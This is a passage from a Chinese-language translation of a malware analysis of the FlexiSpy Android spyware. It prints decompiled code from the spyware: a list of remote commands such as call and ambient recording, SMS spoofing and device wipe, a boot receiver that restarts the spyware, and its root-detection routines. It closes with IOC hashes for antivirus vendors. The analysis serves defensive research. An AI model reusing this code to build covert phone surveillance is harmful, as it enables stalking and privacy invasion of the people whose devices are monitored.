RemoteFunction.REQUEST_TEMPORAL_APPLICATION_CONTROL=newRemoteFunction("REQUEST_TEMPORAL_APPLICATION_CONTROL",56); RemoteFunction.SET_DOWNLOAD_BINARY_AND_UPDATE_SILENT_MODE=newRemoteFunction("SET_DOWNLOAD_BINARY_AND_UPDATE_SILENT_MODE",57); RemoteFunction.SEND_HEARTBEAT=newRemoteFunction("SEND_HEARTBEAT",58); RemoteFunction.SEND_MOBILE_NUMBER=newRemoteFunction("SEND_MOBILE_NUMBER",59); RemoteFunction.SEND_SETTINGS_EVENT=newRemoteFunction("SEND_SETTINGS_EVENT",60); RemoteFunction.SEND_EVENTS=newRemoteFunction("SEND_EVENTS",61); RemoteFunction.REQUEST_CONFIGURATION=newRemoteFunction("REQUEST_CONFIGURATION",62); RemoteFunction.SEND_CURRENT_URL=newRemoteFunction("SEND_CURRENT_URL",63); RemoteFunction.SEND_BOOKMARKS=newRemoteFunction("SEND_BOOKMARKS",64); RemoteFunction.DEBUG_SWITCH_CONTAINER=newRemoteFunction("DEBUG_SWITCH_CONTAINER",65); RemoteFunction.DEBUG_HIDE_APP=newRemoteFunction("DEBUG_HIDE_APP",66); RemoteFunction.DEBUG_UNHIDE_APP=newRemoteFunction("DEBUG_UNHIDE_APP",67); RemoteFunction.DEBUG_IS_DAEMON=newRemoteFunction("DEBUG_IS_DAEMON",68); RemoteFunction.DEBUG_IS_FULL_MODE=newRemoteFunction("DEBUG_IS_FULL_MODE",69); RemoteFunction.DEBUG_GET_CONFIG_ID=newRemoteFunction("DEBUG_GET_CONFIG_ID",70); RemoteFunction.DEBUG_GET_ACTUAL_CONFIG_ID=newRemoteFunction("DEBUG_GET_ACTUAL_CONFIG_ID",71); RemoteFunction.DEBUG_GET_VERSION_CODE=newRemoteFunction("DEBUG_GET_VERSION_CODE",72); RemoteFunction.DEBUG_SEND_TEST_SMS=newRemoteFunction("DEBUG_SEND_TEST_SMS",73); RemoteFunction.DEBUG_CLOSE_APP=newRemoteFunction("DEBUG_CLOSE_APP",74); RemoteFunction.DEBUG_BRING_UI_TO_HOME_SCREEN=newRemoteFunction("DEBUG_BRING_UI_TO_HOME_SCREEN",75); RemoteFunction.DEBUG_SET_APPLICATION_MODE=newRemoteFunction("DEBUG_SET_APPLICATION_MODE",76); RemoteFunction.DEBUG_GET_APPLICATION_MODE=newRemoteFunction("DEBUG_GET_APPLICATION_MODE",77); RemoteFunction.DEBUG_RESTART_DEVICE=newRemoteFunction("DEBUG_RESTART_DEVICE",78); RemoteFunction.DEBUG_IS_APPENGIN_INIT_COMPLETE=newRemoteFunction("DEBUG_IS_APPENGIN_INIT_COMPLETE",79); RemoteFunction.DEBUG_PRODUCT_VERSION=newRemoteFunction("DEBUG_PRODUCT_VERSION",80); RemoteFunction.DEBUG_IS_CALLRECORDING_SUPPORTED=newRemoteFunction("DEBUG_IS_CALLRECORDING_SUPPORTED",81); RemoteFunction.DEBUG_IS_RESUME_ON_DEMAND_AMBIENT_RECORDING=newRemoteFunction("DEBUG_IS_RESUME_ON_DEMAND_AMBIENT_RECORDING",82); RemoteFunction.SET_MODE_ADDRESS_BOOK=newRemoteFunction("SET_MODE_ADDRESS_BOOK",83); RemoteFunction.SEND_ADDRESS_BOOK=newRemoteFunction("SEND_ADDRESS_BOOK",84); RemoteFunction.REQUEST_BATTERY_INFO=newRemoteFunction("REQUEST_BATTERY_INFO",85); RemoteFunction.REQUEST_MEDIA_HISTORICAL=newRemoteFunction("REQUEST_MEDIA_HISTORICAL",86); RemoteFunction.UPLOAD_ACTUAL_MEDIA=newRemoteFunction("UPLOAD_ACTUAL_MEDIA",87); RemoteFunction.DELETE_ACTUAL_MEDIA=newRemoteFunction("DELETE_ACTUAL_MEDIA",88); RemoteFunction.ON_DEMAND_AMBIENT_RECORD=newRemoteFunction("ON_DEMAND_AMBIENT_RECORD",89); RemoteFunction.ON_DEMAND_IMAGE_CAPTURE=newRemoteFunction("ON_DEMAND_IMAGE_CAPTURE",90); RemoteFunction.ENABLE_CALL_RECORDING=newRemoteFunction("ENABLE_CALL_RECORDING",91); RemoteFunction.SET_CALL_RECORDING_WATCH_FLAG=newRemoteFunction("SET_CALL_RECORDING_WATCH_FLAG",92); RemoteFunction.SET_CALL_RECORDING_AUDIO_SOURCE=newRemoteFunction("SET_CALL_RECORDING_AUDIO_SOURCE",93); RemoteFunction.ENABLE_COMMUNICATION_RESTRICTION=newRemoteFunction("ENABLE_COMMUNICATION_RESTRICTION",94); RemoteFunction.ENABLE_APP_PROFILE=newRemoteFunction("ENABLE_APP_PROFILE",95); RemoteFunction.ENABLE_URL_PROFILE=newRemoteFunction("ENABLE_URL_PROFILE",96); RemoteFunction.SPOOF_SMS=newRemoteFunction("SPOOF_SMS",97); RemoteFunction.SET_PANIC_MODE=newRemoteFunction("SET_PANIC_MODE",98); RemoteFunction.START_PANIC=newRemoteFunction("START_PANIC",99); RemoteFunction.STOP_PANIC=newRemoteFunction("STOP_PANIC",100); RemoteFunction.GET_PANIC_MODE=newRemoteFunction("GET_PANIC_MODE",101); RemoteFunction.PANIC_IMAGE_CAPTURE=newRemoteFunction("PANIC_IMAGE_CAPTURE",102); RemoteFunction.IS_PANIC_ACTIVE=newRemoteFunction("IS_PANIC_ACTIVE",103); RemoteFunction.ENABLE_ALERT=newRemoteFunction("ENABLE_ALERT",104); RemoteFunction.SET_LOCK_DEVICE=newRemoteFunction("SET_LOCK_DEVICE",105); RemoteFunction.SET_UNLOCK_DEVICE=newRemoteFunction("SET_UNLOCK_DEVICE",106); RemoteFunction.SET_WIPE=newRemoteFunction("SET_WIPE",107); RemoteFunction.SYNC_TEMPORAL_APPLICATION_CONTROL=newRemoteFunction("SYNC_TEMPORAL_APPLICATION_CONTROL",108); RemoteFunction.a=newRemoteFunction[]{RemoteFu0x08 如果用户正在使用设备
监控软件监听各种intent表明用户在使用手机:如果屏幕解锁,设备开机等。
label_65://thisisifNOsmsisdetected if((str_intentAction.equals("android.intent.action.BOOT_COMPLETED"))||(str_intentAction.equals("android.intent.action.QUICKBOOT_POWERON"))||(str_intentAction.equals("com.htc.intent.action.QUICKBOOT_POWERON"))){ com.fx.daemon.b.m_relatedToShellCmds(o.m_getDataPath(arg6),"fx.log"); StrictMode.setThreadPolicy(newStrictMode$ThreadPolicy$Builder().permitNetwork().build()); if(CommonReceiver.c()){ return; } if(!CommonReceiver.f_bool_maindZip()){ return; } AppStartUpHandler.a(dataPath,AppStartUpHandler$AppStartUpMethod.BOOT_COMPLETED); ak.m_generatesSameObj(arg6); ak.b(arg6); return; }
第一个条件
在接收到intent后,我们看到if语句
if(CommonReceiver.b_returnTrueIfDebugMode()){ return; }代码只检查是否有DEBUG_IS_FULL_MODE,命令将发送给受害者设备。
第二个条件
第二个if语句如下。它执行另一个系列root检查和检查maind.zip文件是否存在。
if(!CommonReceiver.RootAndMainZipCheck()){//ifnotrootedandazipdoesntexistexit return; } F_bool_maindZip方法与位于/assets/production/文件夹中的maind.zip有关。 privatestaticbooleanRootAndMainZipCheck(){ booleanreturnVal=true; Stringstr_maindZipPath=o.str_FilePathGetter(b.str_dataMiscAdn,"maind.zip"); if((ShellUtil.m_bool_MultipleRootcheck())&&(ShellUtil.m_ChecksForFIle(str_maindZipPath))){ returnVal=false; } returnreturnVal;//returntrueifrootedANDmaind.zipisfound }这个方法执行一系列root检查。它查看设备的Build Tags值是否存在test-keys,检查SuperUser.APK应用,su二进制的位置,环境路径检查和尝试调用一个shell。代码如下:
publicstaticbooleanm_bool_Rootcheck(){ booleanbool_returnVal=false; if(ShellUtil.bool_debug){ Log.v("ShellUtil","isDeviceRooted#START..."); } Stringstr_buildPropTags=Build.TAGS; booleanstr_TestKeys=str_buildPropTags==null||!str_buildPropTags.contains("test-keys")?false:true; if(ShellUtil.bool_debug){ Log.v("ShellUtil","checkRootMethod1#isDeviceRooted?:"+str_TestKeys); } if((str_TestKeys)||(ShellUtil.f_bool_checksForSUperSuAPK())||(ShellUtil.m_bool_SuCheck())||(ShellUtil.m_boolEnvPathCheck())||(ShellUtil.m_boolTryToExecShell())){ bool_returnVal=true; } if(ShellUtil.bool_debug){ Log.v("ShellUtil","isDeviceRooted#isDeviceRooted?:"+bool_returnVal); } if(ShellUtil.bool_debug){ Log.v("ShellUtil","isDeviceRooted#EXIT..."); } returnbool_returnVal通过下面的方法执行maind.zip检查
publicstaticbooleanm_ChecksForFIle(Stringarg7){ booleanb_returnVal=true; try{ c_RelatedToFxExecLibv2=c_RelatedToFxExecLib.b(); Stringv3=v2.a(String.format("%s\"%s\"","/system/bin/ls",arg7)); v2.d(); if(v3.contains("Nosuchfileordirectory")){ returnfalse; } } catch(CannotGetRootShellExceptionv0_1){ b_returnVal=newFile(arg7).exists(); } returnb_returnVal;回到reveiver
在第二个if语句后有如下的代码。
AppStartUpHandler.a(dataPath,AppStartUpHandler$AppStartUpMethod.BOOT_COMPLETED); ak.m_generatesSameObj(arg6); ak.startCoreService(arg6);//startsthe"engine" return; 非常简单。Ak.startCoreService(arg6)方法只再次启动coreService。记住这是从文章开头的onCreate方法开始的。0x09 下集预告
下一步,我将看下CoreService和其他的intent receiver com.vvt.callhandler.phonestate.OutgoingCallReceiver,其监听去电。
0x0A 新的IOCs
对于AV行业来说,在VirusTotal中可以查找到更多的IOC。
Sha1 文件名:
b1ea0ccf834e4916aee1d178a71aba869ac3b36e libfxexec.so This is actually in the 1.00.1 source hehe ;)
174b285867ae4f3450af59e1b63546a2d8ae0886 maind.zip
0x0B Jeb数据库文件
如果想就纠正任何错误,在这里。
传送门:全球最大的勒索软件FlexiSpy的分析(part1)
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:http://www.cybermerchantsofdeath.com/blog/2017/04/23/FlexiSpy-pt2.html
